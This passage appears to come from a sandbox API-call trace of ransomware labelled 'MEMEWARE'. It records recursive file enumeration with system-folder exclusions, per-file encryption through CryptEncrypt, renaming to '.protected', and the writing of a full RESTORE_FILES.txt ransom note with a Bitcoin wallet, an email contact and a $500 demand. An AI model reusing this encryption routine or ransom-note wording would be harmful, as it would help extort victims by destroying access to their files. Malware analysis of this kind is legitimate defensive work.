lpFindFileData=0x295e560) returned 1 [0078.243] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0078.243] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0078.243] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0078.243] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0078.243] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0078.244] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\..") returned 83 [0078.244] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.244] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.244] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0078.244] lstrcmpiW (lpString1="metadata", lpString2="Windows") returned -1 [0078.244] lstrcmpiW (lpString1="metadata", lpString2="Program Files") returned -1 [0078.244] lstrcmpiW (lpString1="metadata", lpString2="Program Files (x86)") returned -1 [0078.244] lstrcmpiW (lpString1="metadata", lpString2="$Recycle.bin") returned 1 [0078.244] lstrcmpiW (lpString1="metadata", lpString2="System Volume Information") returned -1 [0078.244] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\metadata") returned 89 [0078.244] StrStrIW (lpFirst="metadata", lpSrch=".protected") returned 0x0 [0078.244] lstrcmpW (lpString1="metadata", lpString2="RESTORE_FILES.txt") returned -1 [0078.244] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0078.244] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0078.244] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\metadata" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\crashpad\\metadata"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0078.245] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\metadata") returned 89 [0078.245] StrStrW (lpFirst="metadata", lpSrch=".txt") returned 0x0 [0078.245] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\metadata") returned 89 [0078.245] StrStrW (lpFirst="metadata", lpSrch=".rar") returned 0x0 [0078.245] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\metadata") returned 89 [0078.245] StrStrW (lpFirst="metadata", lpSrch=".zip") returned 0x0 [0078.245] ReadFile (in: hFile=0x154, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e544*=0x0, lpOverlapped=0x0) returned 1 [0078.245] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.245] WriteFile (in: hFile=0x154, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e544*=0x0, lpOverlapped=0x0) returned 1 [0078.245] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.245] WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0078.246] WriteFile (in: hFile=0x154, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) returned 1 [0078.246] CloseHandle (hObject=0x154) returned 1 [0078.247] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\metadata.protected") returned 99 [0078.247] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\metadata" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\crashpad\\metadata"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\metadata.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\crashpad\\metadata.protected")) returned 1 [0078.247] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0078.247] lstrcmpiW (lpString1="reports", lpString2="Windows") returned -1 [0078.247] lstrcmpiW (lpString1="reports", lpString2="Program Files") returned 1 [0078.247] lstrcmpiW (lpString1="reports", lpString2="Program Files (x86)") returned 1 [0078.247] lstrcmpiW (lpString1="reports", lpString2="$Recycle.bin") returned 1 [0078.247] lstrcmpiW (lpString1="reports", lpString2="System Volume Information") returned -1 [0078.247] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\reports") returned 88 [0078.247] lstrcmpW (lpString1="reports", lpString2=".") returned 1 [0078.247] lstrcmpW (lpString1="reports", lpString2="..") returned 1 [0078.247] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\reports\\*") returned 90 [0078.247] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\reports\\*", lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0x47bb10 [0078.248] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0078.248] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0078.248] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0078.248] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0078.248] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0078.248] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\reports\\.") returned 90 [0078.248] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.248] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0078.248] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0078.248] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0078.248] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0078.248] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0078.248] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0078.248] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\reports\\..") returned 91 [0078.248] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.248] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.248] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0 [0078.248] FindClose (in: hFindFile=0x47bb10 | out: hFindFile=0x47bb10) returned 1 [0078.248] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\reports\\RESTORE_FILES.txt") returned 106 [0078.248] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\reports\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\crashpad\\reports\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0078.249] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0078.249] WriteFile (in: hFile=0x154, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e2d4*=0x53d, lpOverlapped=0x0) returned 1 [0078.250] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0078.250] WriteFile (in: hFile=0x154, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e2d4*=0x2ac, lpOverlapped=0x0) returned 1 [0078.250] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0078.250] WriteFile (in: hFile=0x154, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e2d4*=0xb1, lpOverlapped=0x0) returned 1 [0078.250] CloseHandle (hObject=0x154) returned 1 [0078.250] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0078.250] lstrcmpiW (lpString1="settings.dat", lpString2="Windows") returned -1 [0078.250] lstrcmpiW (lpString1="settings.dat", lpString2="Program Files") returned 1 [0078.250] lstrcmpiW (lpString1="settings.dat", lpString2="Program Files (x86)") returned 1 [0078.250] lstrcmpiW (lpString1="settings.dat", lpString2="$Recycle.bin") returned 1 [0078.250] lstrcmpiW (lpString1="settings.dat", lpString2="System Volume Information") returned -1 [0078.250] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\settings.dat") returned 93 [0078.250] StrStrIW (lpFirst="settings.dat", lpSrch=".protected") returned 0x0 [0078.250] lstrcmpW (lpString1="settings.dat", lpString2="RESTORE_FILES.txt") returned 1 [0078.250] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0078.250] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0078.250] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\settings.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\crashpad\\settings.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0078.250] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\settings.dat") returned 93 [0078.250] StrStrW (lpFirst="settings.dat", lpSrch=".txt") returned 0x0 [0078.250] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\settings.dat") returned 93 [0078.251] StrStrW (lpFirst="settings.dat", lpSrch=".rar") returned 0x0 [0078.251] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\settings.dat") returned 93 [0078.251] StrStrW (lpFirst="settings.dat", lpSrch=".zip") returned 0x0 [0078.251] ReadFile (in: hFile=0x154, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e544*=0x28, lpOverlapped=0x0) returned 1 [0078.252] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffffd8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.252] WriteFile (in: hFile=0x154, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e544*=0x28, lpOverlapped=0x0) returned 1 [0078.252] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.253] WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0078.253] WriteFile (in: hFile=0x154, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) returned 1 [0078.253] CloseHandle (hObject=0x154) returned 1 [0078.253] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\settings.dat.protected") returned 103 [0078.253] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\settings.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\crashpad\\settings.dat"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\settings.dat.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\crashpad\\settings.dat.protected")) returned 1 [0078.254] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0 [0078.254] FindClose (in: hFindFile=0x47bad0 | out: hFindFile=0x47bad0) returned 1 [0078.254] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\RESTORE_FILES.txt") returned 98 [0078.254] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\crashpad\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0078.266] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0078.266] WriteFile (in: hFile=0x150, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e544*=0x53d, lpOverlapped=0x0) returned 1 [0078.267] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0078.267] WriteFile (in: hFile=0x150, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e544*=0x2ac, lpOverlapped=0x0) returned 1 [0078.267] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0078.267] WriteFile (in: hFile=0x150, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e544*=0xb1, lpOverlapped=0x0) returned 1 [0078.268] CloseHandle (hObject=0x150) returned 1 [0078.269] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0078.269] lstrcmpiW (lpString1="Default", lpString2="Windows") returned -1 [0078.269] lstrcmpiW (lpString1="Default", lpString2="Program Files") returned -1 [0078.269] lstrcmpiW (lpString1="Default", lpString2="Program Files (x86)") returned -1 [0078.269] lstrcmpiW (lpString1="Default", lpString2="$Recycle.bin") returned 1 [0078.269] lstrcmpiW (lpString1="Default", lpString2="System Volume Information") returned -1 [0078.269] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned 79 [0078.269] lstrcmpW (lpString1="Default", lpString2=".") returned 1 [0078.269] lstrcmpW (lpString1="Default", lpString2="..") returned 1 [0078.269] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\*") returned 81 [0078.269] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\*", lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0x47bad0 [0078.280] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0078.280] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0078.280] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0078.280] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0078.280] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0078.280] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\.") returned 81 [0078.280] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.280] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0078.282] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0078.282] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0078.282] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0078.282] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0078.282] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0078.282] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\..") returned 82 [0078.282] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.282] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.282] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0078.282] lstrcmpiW (lpString1="Cache", lpString2="Windows") returned -1 [0078.282] lstrcmpiW (lpString1="Cache", lpString2="Program Files") returned -1 [0078.282] lstrcmpiW (lpString1="Cache", lpString2="Program Files (x86)") returned -1 [0078.282] lstrcmpiW (lpString1="Cache", lpString2="$Recycle.bin") returned 1 [0078.282] lstrcmpiW (lpString1="Cache", lpString2="System Volume Information") returned -1 [0078.282] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache") returned 85 [0078.282] lstrcmpW (lpString1="Cache", lpString2=".") returned 1 [0078.282] lstrcmpW (lpString1="Cache", lpString2="..") returned 1 [0078.283] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\*") returned 87 [0078.283] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\*", lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0x47bb10 [0078.284] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0078.284] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0078.284] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0078.284] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0078.284] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0078.284] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\.") returned 87 [0078.284] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.284] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0078.284] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0078.284] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0078.284] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0078.284] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0078.284] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0078.284] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\..") returned 88 [0078.284] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.284] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.284] FindNextFileW (in: 